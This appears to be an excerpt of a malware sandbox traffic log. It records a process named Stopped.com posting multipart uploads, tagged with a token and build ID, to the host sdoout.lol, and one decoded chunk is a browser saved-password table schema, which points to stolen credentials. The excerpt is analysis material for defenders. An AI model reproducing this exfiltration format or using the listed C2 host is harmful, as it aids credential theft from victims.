2024-12-31 15:57:48 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 74 6a 6d 79 35 66 6b 78 62 61 31 6e 37 79 6d 37 39 7a 6d 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 74 6a 6d 79 35 66 6b 78 62 61 31 6e 37 79 6d 37 39 7a 6d 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 74 6a 6d 79 35 66 6b 78 62 61 31 6e 37 79 6d 37 39 7a 6d 6f 0d 0a 43 6f 6e 74 Data Ascii: ------tjmy5fkxba1n7ym79zmoContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------tjmy5fkxba1n7ym79zmoContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------tjmy5fkxba1n7ym79zmoCont
2024-12-31 15:57:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:48 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	51512	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:49 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4wln7gvsr9hv3ekxb1d2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 Data Ascii: ------4wln7gvsr9hv3ekxb1d2Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------4wln7gvsr9hv3ekxb1d2Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------4wln7gvsr9hv3ekxb1d2Cont
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	51513	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:50 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8900hvkx4wtjm7g4e3w4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:50 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 30 68 76 6b 78 34 77 74 6a 6d 37 67 34 65 33 77 34 0d 0a 43 6f 6e 74 Data Ascii: ------8900hvkx4wtjm7g4e3w4Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------8900hvkx4wtjm7g4e3w4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------8900hvkx4wtjm7g4e3w4Cont
2024-12-31 15:57:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:50 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:50 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	51514	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:52 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gdjmozcb16p8yuaas00z User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 64 6a 6d 6f 7a 63 62 31 36 70 38 79 75 61 61 73 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 67 64 6a 6d 6f 7a 63 62 31 36 70 38 79 75 61 61 73 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 67 64 6a 6d 6f 7a 63 62 31 36 70 38 79 75 61 61 73 30 30 7a 0d 0a 43 6f 6e 74 Data Ascii: ------gdjmozcb16p8yuaas00zContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------gdjmozcb16p8yuaas00zContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------gdjmozcb16p8yuaas00zCont
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
